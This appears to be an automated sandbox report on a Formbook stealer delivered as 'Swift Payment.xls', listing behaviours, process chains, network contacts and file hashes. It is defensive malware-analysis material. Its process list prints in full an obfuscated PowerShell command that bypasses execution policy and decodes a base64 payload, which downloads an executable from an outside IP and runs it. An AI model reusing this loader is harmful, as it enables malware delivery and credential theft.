Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-rhtsbswarc
Target Swift Payment.xls
SHA256 eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

Threat Level: Known bad

The file Swift Payment.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 14:12

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 14:12

Reported

2024-08-29 14:14

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1640 wrote to memory of 972 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1640 wrote to memory of 972 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.42:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 42.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.29.10:443 g.bing.com tcp
US 8.8.8.8:53 10.29.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp

Files

memory/1640-0-0x00007FFBD436D000-0x00007FFBD436E000-memory.dmp

memory/1640-1-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-3-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-2-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-4-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-6-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-7-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-5-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-9-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-11-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-10-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-8-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-13-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-15-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-16-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-17-0x00007FFB91AA0000-0x00007FFB91AB0000-memory.dmp

memory/1640-14-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-12-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-18-0x00007FFB91AA0000-0x00007FFB91AB0000-memory.dmp

memory/972-41-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/972-43-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/1640-45-0x00007FFBD436D000-0x00007FFBD436E000-memory.dmp

memory/1640-46-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/972-50-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

memory/972-51-0x00007FF7B29C0000-0x00007FF7B29C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 1b306dd9f3f47d2ce7ee410ccf2de568
SHA1 11406807cc231635dc166bf0b007c3d626103125
SHA256 c6546978d3810ba46cd19a1d96ec849b6199a0c02b6105f8f34364f38621a2c9
SHA512 372a538ad283e1fab8d863d61857a6c435578e24fdab7b115d149baf27808262177ae083d3e4b999db567b86243579f5043054cc520c7dfe68414c976a7e5f2a

memory/1640-83-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-86-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-85-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-84-0x00007FFB94350000-0x00007FFB94360000-memory.dmp

memory/1640-87-0x00007FFBD42D0000-0x00007FFBD44C5000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 14:12

Reported

2024-08-29 14:14

Platform

win7-20240708-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1880 set thread context of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 572 set thread context of 1212 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Windows\Explorer.EXE
PID 572 set thread context of 1212 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Windows\Explorer.EXE
PID 2024 set thread context of 1212 N/A C:\Windows\SysWOW64\help.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\help.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\help.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2740 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2740 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 2928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2928 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2928 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2820 wrote to memory of 1880 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2820 wrote to memory of 1880 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1880 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1212 wrote to memory of 2024 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1212 wrote to memory of 2024 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 2024 wrote to memory of 2416 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2416 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Windows\SysWOW64\help.exe

"C:\Windows\SysWOW64\help.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.50:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.opinatlas.app udp
US 8.8.8.8:53 www.46rr211sm.autos udp
US 8.8.8.8:53 www.3tcxr.xyz udp
US 8.8.8.8:53 www.iano-world.net udp

Files

memory/2640-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2640-1-0x000000007234D000-0x0000000072358000-memory.dmp

memory/2740-19-0x0000000001D80000-0x0000000001D82000-memory.dmp

memory/2640-20-0x0000000001E50000-0x0000000001E52000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 82c02175409404faa4a437555f8afd87
SHA1 e4e4779a8c2d98aa2117e1eb26554fe7acc910c7
SHA256 ce2fa9fc2af477205b89c9c92764024096048565c70c8f147af267127702698b
SHA512 a888da3d47f2eb007b4ad839f6a2e2cf715f8056f20b9101f893e8476297b7fe6c2dc8d86034eb51ce22e1fd1cb396f137cb177f5884b79af1b20f4dbbf49aac

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 3e67053f124cd1c8e14d5e35f85e1cbb
SHA1 b2fbca7441eb8dc1665a51ca6990c7df4f4ae7a4
SHA256 cc2118cbdaaf54d1a2201d443b821962ddf2fb08899939e8afd8eaff8a05cc86
SHA512 2a08c98130f3cb46b93b986287de1f89d714d97337d306dce271da96f976b2e479e5d2d5b1f883b191389158660a570c3ba3a43ddae513da662ac1c546474081

C:\Users\Admin\AppData\Local\Temp\CabAF14.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\IEnetstateIntenet[1].hta

MD5 3e26ce1d61b2d6fe88553bc84b6ac32a
SHA1 c7109174e1d1faea9cceaa01955bbe2d138ed2d1
SHA256 f450ceba92f654aee3efb78425232cd2917de9e43a258423cc98b9667be6102f
SHA512 e931d2c520c205127fd4e3ad0a577111eb50cb592235447931a2739a4187afb0d9c6916acaee5ca58a82d4f27d652b620d6cba8d62814e405671b94bf5766259

\??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline

MD5 ae56762dc0d08b6711b54d95e3924a32
SHA1 b96e539a51c2c432cde1393bf5a555706aaa438a
SHA256 a4a3d179bf3f5c4b49b792211e81b7dddf4b4a86521f75b5422ed418d887b679
SHA512 a667b7354c055c1a5cbcd652b66566e851ed9ffdef1fbef40a5dc93e3f7f8bbf5da929b479bad43bb02a39108f1b8fcd9b58a6d3960985130b1daffa4cbb5a56

\??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.0.cs

MD5 ea113715d78eb5483c3507b3cbaebc06
SHA1 daa1297b0545649dd504537c2810082ef4156c32
SHA256 812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d
SHA512 3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

\??\c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp

